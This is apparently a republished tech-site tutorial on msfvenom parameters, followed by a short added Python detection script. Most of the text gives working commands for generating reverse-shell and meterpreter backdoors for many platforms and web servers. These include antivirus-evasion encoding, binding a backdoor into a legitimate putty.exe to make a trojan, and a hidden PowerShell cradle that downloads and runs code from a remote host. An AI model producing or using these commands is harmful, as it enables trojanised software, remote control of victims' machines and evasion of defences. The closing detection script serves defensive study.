2025-01-22 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article walks through the msfvenom parameters with examples. The editor finds it very practical and shares it here for study; I hope you get something out of reading it.
Parameter description:
-p (--payload-options)
Payload to use.
There are many payloads. msfvenom generates a backdoor for the target platform from the selected payload, so only by choosing the right payload and filling in the correct IP and port do you get a backdoor in the right language for the right platform.
(--payload-options lists payload options)
-l
List all payloads, encoders and nops.
-f (--help-formats)
Output file format.
(--help-formats lists all file formats)
Executable formats:
asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, war
Transform formats:
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
-e
Encode the payload to avoid antivirus detection.
-a (--platform, --help-platforms)
Select the architecture and platform.
x86 | x64 | x86_64
Platforms:
windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe
-o
File output.
-s
Maximum length of the generated payload, i.e. the file size.
-b
Characters to avoid, for example: do not use '\0f'.
-i
Number of encoding iterations.
-c
Add your own shellcode.
-x | -k
Bundling. For example, given a normal file normal.exe, this option binds the backdoor to that program.
Example:
Example 1 (simple generation):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.0.102 LPORT=11111 -f exe -o /Users/jiangzhehao/Downloads/1.exe
-p specifies the payload; the payload's options follow the payload name
-o specifies the save path of the output, including the file name
Example 2 (replace the specified characters):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.0.102 LPORT=11111 -b '\x00' -f exe -o /Users/jiangzhehao/Downloads/1.exe
-b, --bad-chars replaces bad characters in the code, such as '\x00\xff'
Example 3 (specify encoder):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.0.102 LPORT=11111 -b '\x00' -e x86/shikata_ga_nai -f exe -o /Users/jiangzhehao/Downloads/1.exe
-e specifies the encoder to use
Example 4 (bind the backdoor to other executable programs):
msfvenom -p windows/meterpreter/reverse_http LHOST=172.16.0.102 LPORT=3333 -x /Users/jiangzhehao/Downloads/putty.exe -k -f exe -o /Users/jiangzhehao/Downloads/puuty_bind.exe
-p windows/meterpreter/reverse_http LHOST=172.16.0.102 LPORT=3333 specifies the payload and its parameters
-x /Users/jiangzhehao/Downloads/putty.exe is the executable to bind to
-k separates the payload from the original host file and creates a separate process
-f exe specifies the output format
-o /Users/jiangzhehao/Downloads/puuty_bind.exe specifies the output path
Example 5 Windows
msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp -i 3 -e x86/shikata_ga_nai -f exe -o C:\back.exe
msfvenom --platform windows -a x64 -p windows/x64/meterpreter/reverse_tcp -f exe -o C:\back.exe
Example 6 Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
Example 7 MAC
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
Example 8 PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
Example 9 Asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
Example 10 Aspx
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f aspx > shell.aspx
Example 11 JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
Example 12 War
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
Example 13 Bash
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
Example 14 Perl
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
Example 15 Python
msfvenom -p python/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.py
Example 16 exe uses exec to execute powershell backdoor
msfvenom -p windows/exec CMD="powershell.exe -nop -w hidden -c $M=new-object net.webclient;$M.proxy=[Net.WebRequest]::GetSystemWebProxy();$M.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $M.downloadstring('http://192.168.0.104:8080/4WFjDXrGo7Mj');" -f exe -e x86/shikata_ga_nai -i 6 -o msf.exe
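Seen from the detection side, the PowerShell command line that Example 16 embeds leaves a recognizable process-creation record. The following is an added example, not part of the original article: it scores command lines for the traits visible in that command (no profile, hidden window, WebClient download, IEX). The event structure, host names, PIDs and the threshold are assumptions made for the illustration.

```python
import re

# Indicators taken from the Example 16 command line. PowerShell ignores case
# and accepts abbreviated parameters, so each pattern allows both.
INDICATORS = {
    "no_profile": re.compile(r"(?<![\w-])-nop(?:r\w*)?\b", re.I),
    "hidden_window": re.compile(r"(?<![\w-])-w\w*\s+hidden\b", re.I),
    "webclient": re.compile(r"net\.webclient", re.I),
    "download_call": re.compile(r"\.download(?:string|data|file)\s*\(", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
}
URL = re.compile(r"https?://[^\s'\")]+", re.I)

def score_command_line(cmdline):
    """Return (sorted indicator names, URLs) found in one command line."""
    text = " ".join(cmdline.split())  # collapse runs of whitespace
    hits = sorted(n for n, rx in INDICATORS.items() if rx.search(text))
    return hits, URL.findall(text)

def triage(events, threshold=3):
    """Alert on PowerShell process events with >= threshold indicators."""
    alerts = []
    for ev in events:
        if "powershell" not in ev["cmdline"].lower():
            continue
        hits, urls = score_command_line(ev["cmdline"])
        if len(hits) >= threshold:
            alerts.append({"host": ev["host"], "pid": ev["pid"],
                           "hits": hits, "urls": urls})
    return alerts

# Constructed process-creation events (host names and PIDs are made up).
SAMPLE_EVENTS = [
    {"host": "ws-01", "pid": 4120, "cmdline":
     "powershell.exe -nop -w hidden -c $M=new-object net.webclient;"
     "$M.proxy=[Net.WebRequest]::GetSystemWebProxy();"
     "$M.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
     "IEX $M.downloadstring('http://192.168.0.104:8080/4WFjDXrGo7Mj');"},
    {"host": "ws-02", "pid": 988, "cmdline":
     r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"host": "ws-03", "pid": 77, "cmdline":
     "PowerShell -NoP -WindowStyle Hidden -Command Invoke-Expression "
     "(New-Object Net.WebClient).DownloadString('http://example.test/a')"},
    {"host": "ws-04", "pid": 5, "cmdline": r"C:\Windows\notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

A single indicator such as -NoProfile is common in legitimate administration scripts, which is why the sketch alerts only when several occur together.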
The above is the example analysis of msfvenom parameters. The editor believes it covers some points that we may see or use in our daily work, and hopes you can learn more from this article. For more details, please follow the industry information channel.